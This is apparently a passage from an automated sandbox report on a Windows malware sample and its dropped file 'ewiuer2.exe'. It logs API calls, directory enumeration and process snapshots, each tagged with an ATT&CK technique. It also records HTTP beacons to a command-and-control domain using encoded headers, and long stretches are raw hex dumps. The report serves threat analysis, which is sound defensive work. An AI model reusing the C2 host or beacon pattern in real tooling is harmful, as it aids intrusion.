140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000031000833310003333100000000000000000000002d00000000013ccc120000000000a0d9120095e13c77e3390700feffffff435c407750594077aa000000b80000000233310000333100c4cd1200fcd1120000000000000000000000000000000000000000000000000000000000000000001c5c3f7760d83375ffffffff1700000074cd1200240000000300000064d2120090d71200fcd1120086000000a0cd120096ed40772a333100a06a167586000000c4cd1200fcd112000000000086008800a06a1675c4cd1200916c16752a333100a06a1675a06a167534d2120002020000 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005716)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004ce1200000000005800000054ce1200feffffffdccd1200cf004177d600417727e35577580000002c00000054ce120000000000b0cd12000000000018ce1200 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000667500000000500115000000000006c46675887d1700201d180000000000020000000000000000000001201d1800100000000000010198d0120000000000c4ff120095e13c77f33c0700feffffffe06340771664407700000000887d17000400cc0000000000887d1700807d1700acd11200f4c58e750000150000000000887d1700f8d11200632167750000150000000000887d17003cc966750000000000000000000400000200000000000000887d17008ffc5577000000000400cc000000000000000000000000006455400032d51200f4d61200000400000000000000000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000015000000800050491a00148812000464407738011500e0634077efa65577000000000000150058491a006dd18e759879b6bf6cae0f760000000000000000e8010000d8ef1a00500115000100000000001500500115000c00000058491a005001150002000002180000000222002077000000000000000000000003000000b4871200800000007f070000000000000222002077000000c0759675d8ef1a0000000000c0759675d0871200b830150000000000a82f150028881200dbd28e7558491a00d8ef1a007076b6bf77000000ff2b40778ba655770000000004021500 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e6520000006400eb3207013ce45200ff2b407798e6520095e13c77d33c0700feffffff435c40775059407734020000400200008a056400880564001000000080000000ff2b40774fcb157720a3256dac0115000000150001000000882b1800210057000200000000d19473ac0115000000150088056400220052000200000002000000bcee4077d86f1500000064002000000023004d0000000000e8371a00c86c1500e86d150018861b00907115000000640030e55200e8371a00b0e6520095e13c77eb320700feffffffff2b40779a2a407720a3256d10a3256d00000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000150016000000aa000000000000000000000008381a00c86c1500306e1500c09a1b00e07815007700690068c912007200320070d61200c09a1b00e9e94077c09a1b0000000000aa00000094ca1200ccce120000000000000000000000000000000000000000000000000000000000000000001c5c3f7760d83375ffffffff1700000044ca1200240000000300000034cf120060d41200ccce12008600000070ca120096ed4077e29a1b00a06a16758600000094ca1200ccce12000000000086008800a06a167594ca1200916c1675e29a1b00a06a1675a06a167504cf120002020000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004ce1200000000003e00000054ce1200feffffffdccd1200cf004177d6004177c7a755773e0000001f00000054ce120000000000b0cd12000000000018ce1200 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000667500000000500124000000000006c46675087d2600001227000000000002000000000000000000000100000000100000000000010198d0120000000000c4ff120095e13c7713780700feffffffe06340771664407700000000087d26000400cc0000000000087d2600007d2600acd11200f4c58e750000240000000000087d2600f8d11200632167750000240000000000087d26003cc966750000000000000000000400000200000000000000087d26006fb85577000000000400cc000000000000000000000000006455400032d51200f4d61200000400000000000000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000024000000000030c12900148812000464407738012400e06340770fe25577000000000000240038c129006dd18e7571963dba6cae0f760000000000000000e4010000d62700f1c40024000100000000002400500124000c00000038c129000000000002000000180000002c000000f0871200000000000000000003000000b48712003c6e4077000000000000000000000000407b2600c0759675407b260000000000c0759675d087120079da8e75000000000200000028881200dbd28e7500000000e2d28e7599993dbad6270000ff2b40776be255770000000004022400 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e6620000002c020b7607013ce46200ff2b407798e6620095e13c7733780700feffffff435c40775059407734020000400200008a052c0288052c021000000080000000ff2b4077af8f257720a3256dac0124000000240001000000e02c2700270039000300000000d19473ac0124000000240088052c02280034000300000003000000bcee4077606f240000002c022000000029002f000000000040dd2900506c2400706d240028162c001871240000002c0230e5620040dd2900b0e6620095e13c770b760700feffffffff2b40779a2a407720a3256d10a3256d00000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004077e7bb557764d51200ac032400000024000200000200000000500124001f00000000000000000000000300000000000000000000002000000000000000d02100f11f0000000000000068112e0000000000000000000000000048000048f0d32d000000000000000000c8f1290040c02900450000008000000000000000000000009956000102000000d0d11200207e4077a8d21200000000003e004000a8d212000200000074d21200626f4077018240776fb8557764d5120008020000f0d32d00c4ff120040420f006455400032d51200f4d612000004000040420f0000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e4de1200000000003e00000034df1200feffffffbcde1200cf004177d60041779ad74a773e0000001f00000034df12000000000090de120000000000f8de1200 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000012000000000064000000f8e11200d8e21200c4ff1200bd0635758df744f4feffffffcd75337564568f758c01000074e2120064000000d8e2120000000000dce21200267e40008c01000074e2120064000000d8e212000000000000000000b8e94000010000002d781678117809780d781d7836780d781578787849784b784b7840784b784b7848784e7849784a784d7841784b7849784e7840784b78417878787878787878787878787878787878787878787878787878787878787878787878787878787878000000006455400024e5120010e712000100000000000000684f4100 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000028000000000050ee2d00fc9812000464407738012800e0634077da914a77000000000000280058ee2d006dd18e75b91a65816cae0f7600000000000000000402000032220010c40028000100000000002800500128000c00000058ee2d000000000002000000180000002c000000d89812000000000000000000030000009c9812003c6e4077000000000000000000000000507b2a00c0759675507b2a0000000000c0759675b898120079da8e75000000000200000010991200dbd28e7500000000e2d28e75011b658132220000ff2b40777e904a770000000004022800 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e65a0000002802361518013ce45a01ff2b407798e65a0195e13c770e1b1800feffffff435c40775059407734020000400200008a052802880528021000000080000000ff2b407792ec027620a3256dac0128000000280001000000803c2b002a002a001b00000000d19473ac01280000002800880528022b0025001b0000001b000000bcee4077706f280000002802200000002c0020000000000080052e00606c2800806d2800b8cc2e00287128000000280230e55a0180052e00b0e65a0195e13c7736151800feffffffff2b40779a2a407720a3256d10a3256d00000000 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"5912\" - (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"6088\" - (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"3644\" - (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindFirstFileW\" with parameter %APPDATA%\\*.* (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Adobe (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter ewiuer2.exe (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter HNC (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Identities (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Macromedia (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Media Center Programs (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Microsoft (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Mozilla (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Sun (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"FindNextFileW\" with parameter Wireshark (UID: 00000000-00005716)\n \"ewiuer2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\System32\\*.* (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 0409 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 12520437.cpx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 12520850.cpx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter aaclient.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ewiuer2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-118", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the URL data", "description": "\"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /198/383.html\"\n Found http requests in header \"GET /605/309.html\"\n Found http requests in header \"GET /745/727.html\"\n Found http requests in header \"GET /629/272.html\"\n Found http requests in header \"GET /81/874.html\"\n Found http requests in header \"GET /913/906.html\"\n Found http requests in header \"GET /238/455.html\"\n Found http requests in header \"GET /396/104.html\"\n Found http requests in header \"GET /904/267.html\"\n Found http requests in header \"GET /245/114.html\"\n Found http requests in header \"GET /845/914.html\"\n Found http requests in header \"GET /350/559.html\"\n Found http requests in header \"GET /184/340.html\"\n Found http requests in header \"GET /458/753.html\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/198/383\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"apfc\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"1213\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"423/\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"a2g3746b\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /198/383.html HTTP/1.1From: 133833031401516551Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/605/309\" in header \"GET /605/309.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /605/309.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"669abqgd\" in header \"GET /605/309.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"5340\" in header \"GET /605/309.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /605/309.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/745/727\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"669abqgd\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"5340\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"ee677982\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"d98c5ia8\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"e45fHost\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /745/727.html HTTP/1.1From: 133833061259316839Via: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45fHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/629/272\" in header \"GET /629/272.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;ebHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /629/272.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;ebHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /629/272.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;ebHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"3f6e6a74dh56748hi6hi49h5\" in header \"GET /629/272.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;ebHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /629/272.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;ebHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /81/874.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /81/874.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"ef41\" in header \"GET /81/874.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"1f58\" in header \"GET /81/874.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /81/874.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/913/906\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"g1c5\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"g468\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /913/906.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/238/455\" in header \"GET /238/455.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /238/455.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /238/455.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"77e7f7de\" in header \"GET /238/455.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /238/455.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/396/104\" in header \"GET /396/104.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?47675gf15ic765e4bdiec6bd3d632g:/`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET 